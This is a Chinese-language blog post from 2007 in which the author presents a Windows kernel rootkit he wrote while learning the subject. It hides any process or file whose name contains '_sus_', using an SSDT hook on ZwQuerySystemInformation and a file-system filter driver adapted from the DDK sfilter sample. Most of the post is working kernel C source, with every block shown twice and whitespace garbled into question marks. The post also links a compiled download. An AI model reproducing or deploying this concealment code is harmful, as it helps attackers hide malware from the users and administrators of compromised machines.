S.l.e!ep.￠%

我寫的第一個rootkit--隱藏文件和進程[ 2007-10-02 16:41:07 | 作者: dklkt ]
字號: 大 | 中 | 小
十一前寫的,這兩天比較忙,所以現在才發上來.

??? 下面是本程序的用法:view plaincopy to clipboardprint?
=================================================================??
This is SUS's rootkit. It can hide files and processes??
?? when their names include "_sus_".??
=================================================================??
Written by dklkt.? 2007.9??
Notice that it can't run automaticly after the computer reboot!??
?
Usage: sushide2003 [-start]???????????? Install and start the SUS's rootkit.??
?????? sushide2003? -uninstall????????? Uninstall the rootkit.??
-----------------------------------------------------------------?

=================================================================
This is SUS's rootkit. It can hide files and processes
?? when their names include "_sus_".
=================================================================
Written by dklkt.? 2007.9
Notice that it can't run automaticly after the computer reboot!

Usage: sushide2003 [-start]???????????? Install and start the SUS's rootkit.
?????? sushide2003? -uninstall????????? Uninstall the rootkit.
-----------------------------------------------------------------??? 直接運行,或者加參數-start運行,都是安裝并開始rootkit.而加參數-uninstall則是停掉并移除

rootkt.

??? 這個程序的功能是隱藏所有文件名中含有_sus_的文件,并且也在進程中隱藏它們.

??? 下面說說具體的功能實現:

??? 1.隱藏進程.

?????? 隱藏進程的實現用的是SSDT鉤子技術. SSDT是System Service Dispatch Table(系統服務調度表

).該表可以基于系統調用病好進行索引,以便定位函數的內存地址. 再說說windows操作系統, 有個叫

ZwQuerySystemInformation的函數, Taskmgr.exe通過該函數獲取系統上的進程列表. 我們通過將

NtQuerySystemInformation函數放到SSDT中, 然后在原函數返回的結果上進行過濾,就可以達到隱藏進程

的目的.
???? 這個是新寫的ZwQuerySystemInformation函數:view plaincopy to clipboardprint?
NTSTATUS NewZwQuerySystemInformation(??
??????????? IN ULONG SystemInformationClass,??
??????????? IN PVOID SystemInformation,??
??????????? IN ULONG SystemInformationLength,??
??????????? OUT PULONG ReturnLength)??
{??
?
?? NTSTATUS ntStatus;??
?
?? ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (??
????????? SystemInformationClass,??
????????? SystemInformation,??
????????? SystemInformationLength,??
????????? ReturnLength );??
?
?? if( NT_SUCCESS(ntStatus))???
?? {??
????? // Asking for a file and directory listing??
????? if(SystemInformationClass == 5)??
????? {??
?????? // This is a query for the process list.??
????????????
???? struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)??
?
SystemInformation;??
???????? struct _SYSTEM_PROCESSES *prev = NULL;??
???????
???? while(curr)??
???? {??
??????????? //DbgPrint("Current item is %x\n", curr);??
????? if (curr->ProcessName.Buffer != NULL)??
????? {??
??????? if( wcsstr( ( wchar_t *)(curr->ProcessName.Buffer),???
?
L"_sus_") )??? //進程名中包含_sus_則隱藏??
??????? {??
????????? m_UserTime.QuadPart += curr->UserTime.QuadPart;??
????????? m_KernelTime.QuadPart += curr->KernelTime.QuadPart;??
?
????????? if(prev) // Middle or Last entry??
????????? {??
??????????? if(curr->NextEntryDelta)??
????????????? prev->NextEntryDelta += curr-??
?
>NextEntryDelta;??
??????????? else? // we are last, so make prev the???
?
end??
????????????? prev->NextEntryDelta = 0;??
????????? }??
????????? else?
????????? {??
??????????? if(curr->NextEntryDelta)??
??????????? {??
????????????? // we are first in the list, so???
?
move it forward??
????????????? (char *)SystemInformation += curr-??
?
>NextEntryDelta;??
??????????? }??
??????????? else // we are the only process!??
????????????? SystemInformation = NULL;??
????????? }??
??????? }??
????? }??
????? else // This is the entry for the Idle process??
????? {??
???????? // Add the kernel and user times of _root_*???
???????? // processes to the Idle process.??
???????? curr->UserTime.QuadPart += m_UserTime.QuadPart;??
???????? curr->KernelTime.QuadPart += m_KernelTime.QuadPart;??
?
???????? // Reset the timers for next time we filter??
???????? m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;??
????? }??
????? prev = curr;??
??????? if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);??
??????? else curr = NULL;??
?????? }??
??? }??
??? else if (SystemInformationClass == 8) // Query for SystemProcessorTimes??
??? {??
???????? struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)??
?
SystemInformation;??
???????? times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;??
??? }??
?
?? }??
?? return ntStatus;??
}?

NTSTATUS NewZwQuerySystemInformation(
??????????? IN ULONG SystemInformationClass,
??????????? IN PVOID SystemInformation,
??????????? IN ULONG SystemInformationLength,
??????????? OUT PULONG ReturnLength)
{

?? NTSTATUS ntStatus;

?? ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
????????? SystemInformationClass,
????????? SystemInformation,
????????? SystemInformationLength,
????????? ReturnLength );

?? if( NT_SUCCESS(ntStatus))
?? {
????? // Asking for a file and directory listing
????? if(SystemInformationClass == 5)
????? {
?????? // This is a query for the process list.
?????????
???? struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)

SystemInformation;
???????? struct _SYSTEM_PROCESSES *prev = NULL;
????
???? while(curr)
???? {
??????????? //DbgPrint("Current item is %x\n", curr);
????? if (curr->ProcessName.Buffer != NULL)
????? {
??????? if( wcsstr( ( wchar_t *)(curr->ProcessName.Buffer),

L"_sus_") )??? //進程名中包含_sus_則隱藏
??????? {
????????? m_UserTime.QuadPart += curr->UserTime.QuadPart;
????????? m_KernelTime.QuadPart += curr->KernelTime.QuadPart;

????????? if(prev) // Middle or Last entry
????????? {
??????????? if(curr->NextEntryDelta)
????????????? prev->NextEntryDelta += curr-

>NextEntryDelta;
??????????? else? // we are last, so make prev the

end
????????????? prev->NextEntryDelta = 0;
????????? }
????????? else
????????? {
??????????? if(curr->NextEntryDelta)
??????????? {
????????????? // we are first in the list, so

move it forward
????????????? (char *)SystemInformation += curr-

>NextEntryDelta;
??????????? }
??????????? else // we are the only process!
????????????? SystemInformation = NULL;
????????? }
??????? }
????? }
????? else // This is the entry for the Idle process
????? {
???????? // Add the kernel and user times of _root_*
???????? // processes to the Idle process.
???????? curr->UserTime.QuadPart += m_UserTime.QuadPart;
???????? curr->KernelTime.QuadPart += m_KernelTime.QuadPart;

???????? // Reset the timers for next time we filter
???????? m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
????? }
????? prev = curr;
??????? if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
??????? else curr = NULL;
?????? }
??? }
??? else if (SystemInformationClass == 8) // Query for SystemProcessorTimes
??? {
???????? struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)

SystemInformation;
???????? times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
??? }

?? }
?? return ntStatus;
}??? 2.隱藏文件

????? 本來隱藏文件也可以用鉤子的,但是由于手頭有MS的IFS DDK,所以干脆寫成了文件過濾驅動.它直

接作用于文件系統驅動之上, 將其得到的結果修改后返回上層驅動. 因為文件過濾驅動比較復雜,因此我

這里只是簡單的修改了一下DDK開發包里提供的sfilter例子.
???? 首先是創建一個處理IRP_MJ_DIRECTORY_CONTROL的例程FsDirectoryControlview plaincopy to clipboardprint?
//=================================================??
NTSTATUS??
FsDirectoryControl(IN PDEVICE_OBJECT DeviceObject,??
?????????????????? IN PIRP Irp)??
{??
??? NTSTATUS status;??
??? PIO_STACK_LOCATION irpSp = IoGetCurrentIrpStackLocation(Irp);??? //當前Irp??
?
(IO_STACK_LOCATION)的參數??
//??? PDEVICE_EXTENSION devExt = DeviceObject->DeviceExtension;??
? PSFILTER_DEVICE_EXTENSION? devExt = DeviceObject->DeviceExtension;??
??? PFILE_BOTH_DIR_INFORMATION dirInfo = NULL;??
??? KEVENT waitEvent;??
??? //UNICODE_STRING path;??
?
??? ASSERT(IS_MY_DEVICE_OBJECT(DeviceObject));??
?
??? if (IRP_MN_QUERY_DIRECTORY != irpSp->MinorFunction)??
??? {??
??????? goto SkipHandle;??
??? }??
??? if (Irp->RequestorMode == KernelMode)??
??? {??
??????? goto SkipHandle;??
??? }??
? if (KeGetCurrentIrql() != PASSIVE_LEVEL )??
? {??
??? goto SkipHandle;??
? }??
? /*?
??? if (FileBothDirectoryInformation != ((PQUERY_DIRECTORY)&irpSp->Parameters)-?
?
>FileInformationClass)??
??? {?????
??????? goto SkipHandle;?
??? }*/?
? if (irpSp ->Parameters.QueryDirectory.FileInformationClass !=???
?
FileBothDirectoryInformation)??
? {??
??? goto SkipHandle;??
? }??
??? //設置完成回調函數??
??? KeInitializeEvent(&waitEvent, NotificationEvent, FALSE);??
??? IoCopyCurrentIrpStackLocationToNext(Irp);??
??? //IoSetCompletionRoutine??
?
(Irp,CompletionRoutine,context,InvokeOnSuccess,InvokeOnError,InvokeOnCancel);??
??? IoSetCompletionRoutine(??????
??????????????????????????? Irp,??
??????????????????????????? DirControlCompletion,??????? //CompletionRoutine??
??????????????????????????? &waitEvent,??????????????????? //context parameter??
??????????????????????????? TRUE,??
??????????????????????????? TRUE,??
??????????????????????????? TRUE??
??????????????????????????? );??
?
??? status = IoCallDriver(devExt->AttachedToDeviceObject, Irp);??
??? if (STATUS_PENDING == status)??
??? {??
??????? //等待完成??
??????? status = KeWaitForSingleObject(&waitEvent,??
??????????????????????????????????????? Executive,??
??????????????????????????????????????? KernelMode,??
??????????????????????????????????????? FALSE,??
??????????????????????????????????????? NULL??
??????????????????????????????????????? );??
??????? ASSERT(STATUS_SUCCESS == status);??
??? }??
??? if (!NT_SUCCESS(status) ||(0 == irpSp->Parameters.QueryFile.Length))???
??? {??????
??????? IoCompleteRequest(Irp, IO_NO_INCREMENT);??
??????? return status;??
??? }??
??? //KdPrint(("Hook Directory.\n"));??
??? //HandleDirectory(Irp->UserBuffer,? &((PQUERY_DIRECTORY)&irpSp->Parameters)->Length);??
? HandleDirectory(Irp->UserBuffer,? &(Irp->IoStatus.Information));??
?
??? IoCompleteRequest(Irp, IO_NO_INCREMENT);??
??? return status;??
?
SkipHandle:??
??? IoSkipCurrentIrpStackLocation(Irp);??
??? return IoCallDriver(devExt->AttachedToDeviceObject, Irp);??
}?

//=================================================
NTSTATUS
FsDirectoryControl(IN PDEVICE_OBJECT DeviceObject,
?????????????????? IN PIRP Irp)
{
??? NTSTATUS status;
??? PIO_STACK_LOCATION irpSp = IoGetCurrentIrpStackLocation(Irp);??? //當前Irp

(IO_STACK_LOCATION)的參數
//??? PDEVICE_EXTENSION devExt = DeviceObject->DeviceExtension;
? PSFILTER_DEVICE_EXTENSION? devExt = DeviceObject->DeviceExtension;
??? PFILE_BOTH_DIR_INFORMATION dirInfo = NULL;
??? KEVENT waitEvent;
??? //UNICODE_STRING path;

??? ASSERT(IS_MY_DEVICE_OBJECT(DeviceObject));

??? if (IRP_MN_QUERY_DIRECTORY != irpSp->MinorFunction)
??? {
??????? goto SkipHandle;
??? }
??? if (Irp->RequestorMode == KernelMode)
??? {
??????? goto SkipHandle;
??? }
? if (KeGetCurrentIrql() != PASSIVE_LEVEL )
? {
??? goto SkipHandle;
? }
? /*
??? if (FileBothDirectoryInformation != ((PQUERY_DIRECTORY)&irpSp->Parameters)-

>FileInformationClass)
??? {???
??????? goto SkipHandle;
??? }*/
? if (irpSp ->Parameters.QueryDirectory.FileInformationClass !=

FileBothDirectoryInformation)
? {
??? goto SkipHandle;
? }
??? //設置完成回調函數
??? KeInitializeEvent(&waitEvent, NotificationEvent, FALSE);
??? IoCopyCurrentIrpStackLocationToNext(Irp);
??? //IoSetCompletionRoutine

(Irp,CompletionRoutine,context,InvokeOnSuccess,InvokeOnError,InvokeOnCancel);
??? IoSetCompletionRoutine(???
??????????????????????????? Irp,
??????????????????????????? DirControlCompletion,??????? //CompletionRoutine
??????????????????????????? &waitEvent,??????????????????? //context parameter
??????????????????????????? TRUE,
??????????????????????????? TRUE,
??????????????????????????? TRUE
??????????????????????????? );

??? status = IoCallDriver(devExt->AttachedToDeviceObject, Irp);
??? if (STATUS_PENDING == status)
??? {
??????? //等待完成
??????? status = KeWaitForSingleObject(&waitEvent,
??????????????????????????????????????? Executive,
??????????????????????????????????????? KernelMode,
??????????????????????????????????????? FALSE,
??????????????????????????????????????? NULL
??????????????????????????????????????? );
??????? ASSERT(STATUS_SUCCESS == status);
??? }
??? if (!NT_SUCCESS(status) ||(0 == irpSp->Parameters.QueryFile.Length))
??? {???
??????? IoCompleteRequest(Irp, IO_NO_INCREMENT);
??????? return status;
??? }
??? //KdPrint(("Hook Directory.\n"));
??? //HandleDirectory(Irp->UserBuffer,? &((PQUERY_DIRECTORY)&irpSp->Parameters)->Length);
? HandleDirectory(Irp->UserBuffer,? &(Irp->IoStatus.Information));

??? IoCompleteRequest(Irp, IO_NO_INCREMENT);
??? return status;

SkipHandle:
??? IoSkipCurrentIrpStackLocation(Irp);
??? return IoCallDriver(devExt->AttachedToDeviceObject, Irp);
}然后對返回的結果進行操作:view plaincopy to clipboardprint?
//-------------------------------------------??
//隱藏文件過濾的函數??
BOOLEAN?
HandleDirectory(IN OUT PFILE_BOTH_DIR_INFORMATION DirInfo, IN PULONG lpBufLenth)??
{??
? //處理目錄操作??
? PFILE_BOTH_DIR_INFORMATION currentDirInfo = DirInfo;??
? PFILE_BOTH_DIR_INFORMATION lastDirInfo = NULL;??
? ULONG offset = 0;??
? ULONG position = 0;??
? ULONG newLenth = *lpBufLenth;??
//? WCHAR fileName[] = L"Test.txt";??
? do?
? {??
??? offset = currentDirInfo->NextEntryOffset;??
??? if( wcsstr( ( wchar_t *)currentDirInfo->FileName, L"_sus_") )??? //文件中包??
?
含_sus_則隱藏??
??? {??
????? //Now We Will Test The FileName??
????? //KdPrint(("%08x Hided File:%ws[%d]\n", currentDirInfo-??
?
>FileAttributes, currentDirInfo->FileName, currentDirInfo->FileNameLength));??
????? if (0 == offset)??
????? {??
??????? //KdPrint(("l[%d][%d][%d][%d]\n", newLenth, *lpBufLenth,???
?
position, newLenth-(*lpBufLenth - position)));??
??????? //Reset Last DirInfo NextEntryOffset To Zero!!!??
??????? if (lastDirInfo)??
??????? {??
????????? lastDirInfo->NextEntryOffset = 0;??
????????? newLenth -= *lpBufLenth - position;??
??????? }??
??????? else?
??????? {??
????????? currentDirInfo->NextEntryOffset = 0;??
????????? *lpBufLenth = 0;??
????????? return TRUE;??
??????? }??
????? }??
????? else?
????? {??
??????? //KdPrint(("n[%d][%d][%d]\n", newLenth, *lpBufLenth,???
?
position));??
??????? RtlMoveMemory(currentDirInfo, (PUCHAR)currentDirInfo +???
?
offset, *lpBufLenth - position - offset);??
??????? newLenth -= offset;??
??????? position += offset;??
????? }??
??? }??
??? else?
??? {??
????? //KdPrint(("%08x Directory:%ws\n", currentDirInfo->FileAttributes,???
?
currentDirInfo->FileName));??
????? //Move Next??
????? position += offset;??
????? lastDirInfo = currentDirInfo;??
????? currentDirInfo = (PFILE_BOTH_DIR_INFORMATION)((PUCHAR)??
?
currentDirInfo + offset);??
??? }??
? } while (0 != offset);??
? *lpBufLenth = newLenth;??
? return TRUE;??
}??
//-------------------------------??
//完成例程??
NTSTATUS??
DirControlCompletion(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)??
{??
? PKEVENT event = Context;??
?
??? UNREFERENCED_PARAMETER( DeviceObject );??
??? UNREFERENCED_PARAMETER( Irp );??
?
??? ASSERT(IS_MY_DEVICE_OBJECT( DeviceObject ));??
?
? //if (Irp->PendingReturned) IoMarkIrpPending(Irp);??
??? KeSetEvent(event, IO_NO_INCREMENT, FALSE);??
?
??? return STATUS_MORE_PROCESSING_REQUIRED;???
}?

//-------------------------------------------
//隱藏文件過濾的函數
BOOLEAN
HandleDirectory(IN OUT PFILE_BOTH_DIR_INFORMATION DirInfo, IN PULONG lpBufLenth)
{
? //處理目錄操作
? PFILE_BOTH_DIR_INFORMATION currentDirInfo = DirInfo;
? PFILE_BOTH_DIR_INFORMATION lastDirInfo = NULL;
? ULONG offset = 0;
? ULONG position = 0;
? ULONG newLenth = *lpBufLenth;
//? WCHAR fileName[] = L"Test.txt";
? do
? {
??? offset = currentDirInfo->NextEntryOffset;
??? if( wcsstr( ( wchar_t *)currentDirInfo->FileName, L"_sus_") )??? //文件中包

含_sus_則隱藏
??? {
????? //Now We Will Test The FileName
????? //KdPrint(("%08x Hided File:%ws[%d]\n", currentDirInfo-

>FileAttributes, currentDirInfo->FileName, currentDirInfo->FileNameLength));
????? if (0 == offset)
????? {
??????? //KdPrint(("l[%d][%d][%d][%d]\n", newLenth, *lpBufLenth,

position, newLenth-(*lpBufLenth - position)));
??????? //Reset Last DirInfo NextEntryOffset To Zero!!!
??????? if (lastDirInfo)
??????? {
????????? lastDirInfo->NextEntryOffset = 0;
????????? newLenth -= *lpBufLenth - position;
??????? }
??????? else
??????? {
????????? currentDirInfo->NextEntryOffset = 0;
????????? *lpBufLenth = 0;
????????? return TRUE;
??????? }
????? }
????? else
????? {
??????? //KdPrint(("n[%d][%d][%d]\n", newLenth, *lpBufLenth,

position));
??????? RtlMoveMemory(currentDirInfo, (PUCHAR)currentDirInfo +

offset, *lpBufLenth - position - offset);
??????? newLenth -= offset;
??????? position += offset;
????? }
??? }
??? else
??? {
????? //KdPrint(("%08x Directory:%ws\n", currentDirInfo->FileAttributes,

currentDirInfo->FileName));
????? //Move Next
????? position += offset;
????? lastDirInfo = currentDirInfo;
????? currentDirInfo = (PFILE_BOTH_DIR_INFORMATION)((PUCHAR)

currentDirInfo + offset);
??? }
? } while (0 != offset);
? *lpBufLenth = newLenth;
? return TRUE;
}
//-------------------------------
//完成例程
NTSTATUS
DirControlCompletion(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
{
? PKEVENT event = Context;

??? UNREFERENCED_PARAMETER( DeviceObject );
??? UNREFERENCED_PARAMETER( Irp );

??? ASSERT(IS_MY_DEVICE_OBJECT( DeviceObject ));

? //if (Irp->PendingReturned) IoMarkIrpPending(Irp);
??? KeSetEvent(event, IO_NO_INCREMENT, FALSE);

??? return STATUS_MORE_PROCESSING_REQUIRED;
}???? 因為還是初學rootkit,所以以上代碼并非本人原創, 特此聲明. 在此也感謝下作者. 很多地方我也

是正在學習中. 目前正在看Greg Hoglund 和James Butler寫的《ROOTKITS--Windows內核的安全防護》

。也給大家推薦下。另外，順便提下，本程序中所用到的方法都可以被IceSword檢測到。

??? 附件中是編譯好的程序。編譯環境win2003，也可在xp中使用。
??? 為了防止惡意使用，程序加了北斗3.7殼。

?點擊下載
[最后修改由 dklkt， 于 2008-04-27 20:37:40]
標簽: 原創程序
?評論Feed: http://www.dklkt.cn/feed.asp?q=comment&id=39

本文來源：單克隆抗體's blog???
原文地址：http://www.dklkt.cn/article.asp?id=39